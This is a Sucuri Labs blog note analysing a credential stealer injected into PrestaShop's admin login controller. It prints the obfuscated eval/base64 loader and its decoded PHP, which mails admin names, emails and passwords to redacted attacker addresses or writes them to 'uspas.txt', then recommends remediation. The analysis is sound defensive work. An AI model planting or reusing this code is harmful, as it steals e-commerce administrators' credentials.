• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

PrestaShop Login Stealer

October 27, 2016Moe O

FacebookTwitterSubscribe

Lately, we’ve noticed an increase of login credentials stealing attempts and techniques targeting e-commerce based websites. These websites usually have sensitive information (credit card & back-end credentials) that would allow attackers to take advantage of the information & infected website.

This post will uncover a different technique being used against PrestaShop solutions. The technique varies from the one we described in this blog post here.

In this case, attackers also used the ‘./controllers/admin/AdminLoginController.php’ file but they injected a different malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:

<?phpif(function_exists("mail")){    $listo = array( 'eNyong' => 'a<removed>@<removed>mail.com', 'Dowoh' => 'm<removed>l@<removed>mail.com');    foreach($listo as $ming => $imel){        mail($imel,'Setoran Admin '.$_SERVER['HTTPHOST'].' ^^',"Kye Pak $ming,nnNama: ".$employee->firstname." ".$employee->lastname."nEmail: $emailnPassword: $passwd");    }}else{$f=fopen('uspas.txt','a');fwrite($f,"imel:$email | pass: $passwdn");fclose($f);}?>

The attackers used an interesting conditional statement that would give them the information they were after regardless of server limitations. In other words, they were checking if the server had mailing capabilities to send all the sensitive data to a specific address but if it didn’t, it would simply write into the system a file called ‘uspas.txt’ with the username and password.

From there attackers could just choose between checking the e-mail or accessing the .txt file into the victim’s website.

In case of a compromise, we should consider that all user accounts and their personal information were stolen, therefore it’s recommended changing all passwords from the back-end, cPanel, SFTP and other connection mechanisms that could give attackers any leverage.

Business’s reputation can be damaged if any sensitive information or unauthorized use of customer’s credits card information fall into the wrong hands, therefore keeping good security practices, such as having a File Integrity Monitoring, Web Application Firewall and other methods will help reducing the risks of infection.

FacebookTwitterSubscribe

Categories: Sucuri LabsTags: Labs Note

About Moe O

Moe O is Sucuri’s Website Security Analyst. Moe's main responsibilities include remediation. His professional experience covers 10 years of remediation. When Moe isn’t fighting or researching malware, you might find him traveling. Connect with him on our Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.